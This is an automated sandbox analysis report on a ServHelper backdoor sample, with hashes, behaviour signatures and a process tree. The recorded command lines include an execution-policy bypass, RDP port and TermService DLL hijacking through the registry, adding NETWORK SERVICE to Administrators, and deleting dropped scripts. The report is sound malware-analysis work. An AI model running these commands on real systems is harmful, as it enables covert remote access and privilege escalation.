Analysis
-
max time kernel
82s -
max time network
136s -
platform
windows10_x64 -
resource
win10-en -
submitted
14-09-2021 14:11
Static task
static1
Behavioral task
behavioral1
Sample
608b93e344bd3dbb09d0af9da6856061.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
608b93e344bd3dbb09d0af9da6856061.exe
Resource
win10-en
General
-
Target
608b93e344bd3dbb09d0af9da6856061.exe
-
Size
4.0MB
-
MD5
608b93e344bd3dbb09d0af9da6856061
-
SHA1
b7c8bd7bace350d3c9c054ebb58f25535d22ee95
-
SHA256
5d45cef43fb4c150c33337fb369a89800f9d235eee1dbdac13a8f6fd13bc1ee4
-
SHA512
6e47bb4688737505af62a8c67cea4143185dc047340d8943d412b5274b229bd24628a31576a3250cdfb69b0b4fcfd74140fe83355f49527e7cf9f465c30ac131
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe -
Drops file in Windows directory 8 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 3644 powershell.exe 3644 powershell.exe 3644 powershell.exe 4080 powershell.exe 4080 powershell.exe 4080 powershell.exe 2460 powershell.exe 2460 powershell.exe 2460 powershell.exe 3688 powershell.exe 3688 powershell.exe 3688 powershell.exe 3644 powershell.exe 3644 powershell.exe 3644 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 624 -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3644 powershell.exe Token: SeDebugPrivilege 4080 powershell.exe Token: SeDebugPrivilege 2460 powershell.exe Token: SeDebugPrivilege 3688 powershell.exe -
Suspicious use of WriteProcessMemory 63 IoCs
Processes:
608b93e344bd3dbb09d0af9da6856061.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.exedescription pid process target process PID 3548 wrote to memory of 3644 3548 608b93e344bd3dbb09d0af9da6856061.exe powershell.exe PID 3548 wrote to memory of 3644 3548 608b93e344bd3dbb09d0af9da6856061.exe powershell.exe PID 3548 wrote to memory of 3644 3548 608b93e344bd3dbb09d0af9da6856061.exe powershell.exe PID 3644 wrote to memory of 3748 3644 powershell.exe csc.exe PID 3644 wrote to memory of 3748 3644 powershell.exe csc.exe PID 3644 wrote to memory of 3748 3644 powershell.exe csc.exe PID 3748 wrote to memory of 3716 3748 csc.exe cvtres.exe PID 3748 wrote to memory of 3716 3748 csc.exe cvtres.exe PID 3748 wrote to memory of 3716 3748 csc.exe cvtres.exe PID 3644 wrote to memory of 4080 3644 powershell.exe powershell.exe PID 3644 wrote to memory of 4080 3644 powershell.exe powershell.exe PID 3644 wrote to memory of 4080 3644 powershell.exe powershell.exe PID 3644 wrote to memory of 2460 3644 powershell.exe powershell.exe PID 3644 wrote to memory of 2460 3644 powershell.exe powershell.exe PID 3644 wrote to memory of 2460 3644 powershell.exe powershell.exe PID 3644 wrote to memory of 3688 3644 powershell.exe powershell.exe PID 3644 wrote to memory of 3688 3644 powershell.exe powershell.exe PID 3644 wrote to memory of 3688 3644 powershell.exe powershell.exe PID 3644 wrote to memory of 424 3644 powershell.exe reg.exe PID 3644 wrote to memory of 424 3644 powershell.exe reg.exe PID 3644 wrote to memory of 424 3644 powershell.exe reg.exe PID 3644 wrote to memory of 1012 3644 powershell.exe reg.exe PID 3644 wrote to memory of 1012 3644 powershell.exe reg.exe PID 3644 wrote to memory of 1012 3644 powershell.exe reg.exe PID 3644 wrote to memory of 2364 3644 powershell.exe reg.exe PID 3644 wrote to memory of 2364 3644 powershell.exe reg.exe PID 3644 wrote to memory of 2364 3644 powershell.exe reg.exe PID 3644 wrote to memory of 2172 3644 powershell.exe net.exe PID 3644 wrote to memory of 2172 3644 powershell.exe net.exe PID 3644 wrote to memory of 2172 3644 powershell.exe net.exe PID 2172 wrote to memory of 2784 2172 net.exe net1.exe PID 2172 wrote to memory of 2784 2172 net.exe net1.exe PID 2172 wrote to memory of 2784 2172 net.exe net1.exe PID 3644 wrote to memory of 584 3644 powershell.exe cmd.exe PID 3644 wrote to memory of 584 3644 powershell.exe cmd.exe PID 3644 wrote to memory of 584 3644 powershell.exe cmd.exe PID 584 wrote to memory of 740 584 cmd.exe cmd.exe PID 584 wrote to memory of 740 584 cmd.exe cmd.exe PID 584 wrote to memory of 740 584 cmd.exe cmd.exe PID 740 wrote to memory of 696 740 cmd.exe net.exe PID 740 wrote to memory of 696 740 cmd.exe net.exe PID 740 wrote to memory of 696 740 cmd.exe net.exe PID 696 wrote to memory of 1312 696 net.exe net1.exe PID 696 wrote to memory of 1312 696 net.exe net1.exe PID 696 wrote to memory of 1312 696 net.exe net1.exe PID 3644 wrote to memory of 1456 3644 powershell.exe cmd.exe PID 3644 wrote to memory of 1456 3644 powershell.exe cmd.exe PID 3644 wrote to memory of 1456 3644 powershell.exe cmd.exe PID 1456 wrote to memory of 1544 1456 cmd.exe cmd.exe PID 1456 wrote to memory of 1544 1456 cmd.exe cmd.exe PID 1456 wrote to memory of 1544 1456 cmd.exe cmd.exe PID 1544 wrote to memory of 1572 1544 cmd.exe net.exe PID 1544 wrote to memory of 1572 1544 cmd.exe net.exe PID 1544 wrote to memory of 1572 1544 cmd.exe net.exe PID 1572 wrote to memory of 1592 1572 net.exe net1.exe PID 1572 wrote to memory of 1592 1572 net.exe net1.exe PID 1572 wrote to memory of 1592 1572 net.exe net1.exe PID 3644 wrote to memory of 2264 3644 powershell.exe cmd.exe PID 3644 wrote to memory of 2264 3644 powershell.exe cmd.exe PID 3644 wrote to memory of 2264 3644 powershell.exe cmd.exe PID 3644 wrote to memory of 1012 3644 powershell.exe cmd.exe PID 3644 wrote to memory of 1012 3644 powershell.exe cmd.exe PID 3644 wrote to memory of 1012 3644 powershell.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\608b93e344bd3dbb09d0af9da6856061.exe"C:\Users\Admin\AppData\Local\Temp\608b93e344bd3dbb09d0af9da6856061.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3548 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zboakoxb\zboakoxb.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:3748 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1BBB.tmp" "c:\Users\Admin\AppData\Local\Temp\zboakoxb\CSC6678B83EFD544333B99B4AFEEE122FE.TMP"4⤵PID:3716
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4080
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:1012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:2364
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:2784
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:584 -
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:696 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:1312
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:1456 -
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Windows\SysWOW64\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:1592
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:2264
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:1012
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
f3068198b62b4b70404ec46694d632be
SHA17b0b31ae227cf2a78cb751573a9d07f755104ea0
SHA256bd0fab28319be50795bd6aa9692742ba12539b136036acce2e0403f10a779fc8
SHA512ef285a93898a9436219540f247beb52da69242d05069b3f50d1761bb956ebb8468aeaeadcb87dd7a09f5039c479a31f313c83c4a63c2b2f789f1fe55b4fa9795
-
MD5
261cb7114baae3ece6e3cf0d34d687c1
SHA134fef5e12d4ea071c445862555ccb86efe896ea3
SHA256a998df994f127c87295e1dc1343ec203d4399d2b822f781848acd3eaf01282f0
SHA512025c3fec8d259ba9d6c35dd787052b74260f45a9a7bb69ea2bea3ad28ca799d6816d7ef65a9ee571c42f38ec2741fec5c7e08cfa9915e79037c8504539225016
-
MD5
794bf0ae26a7efb0c516cf4a7692c501
SHA1c8f81d0ddd4d360dcbe0814a04a86748f99c6ff2
SHA25697753653d52aaa961e4d1364b5b43551c76da9bb19e12f741bd67c986259e825
SHA51220c97972a1256375157f82a859ce4936613fe109d54c63bbec25734edc3a567ca976b342a21ef5f25571b3c1959afe618ad9f9f17a817cfd731d1504541b1a75
-
MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
MD5
d3edbd045bfff76d67b2c22e68b97e13
SHA1a072ccca2930d907a4b0cc33a76dd58711aa4a3e
SHA256d520a040375f61b848f15f118743ddd3bd4e0d472951480b0341ebb603d76e90
SHA51209ce18f829790f7b61016e4b58367441efb770e708e83e3cc3f23a45f21652c8a99a91920d2b448a073409fdf6200868be1c5e6c1547f46762abd49defce9969
-
MD5
9884cdfdca445f9245a876aca44eeb2f
SHA16e5b60de8171e1e7d04437cb038bde7cd58d196f
SHA2569adbafb99cceabee6e76d625d9811e9354596df7b2b6d4cde6879dff38d2c9e0
SHA5120ccff0c200aa0a6bbc3e36bd001bfe938c499a173a0a9a19ce2e87cbdcf55d86a6a093f4f9c8d18666b0d20443bfeea55b99ffef16036f569fb9b4bbeba57941
-
MD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
MD5
d0ca721556c0aecac84c63153d13ac60
SHA1141718caaa783b7114956ea839226442453e4852
SHA2562a94500f7cddc780b6bb28564b11724d696c4b90832a453d4c40a4f392ca7c16
SHA5127b89f9cd9353f335231df0b192370de56d9d8f5b192574008f52d82dcd0568e940fd2403faa7d3209333f236c3e0a1bf552ff826a46c631c7ebe969b02b77e84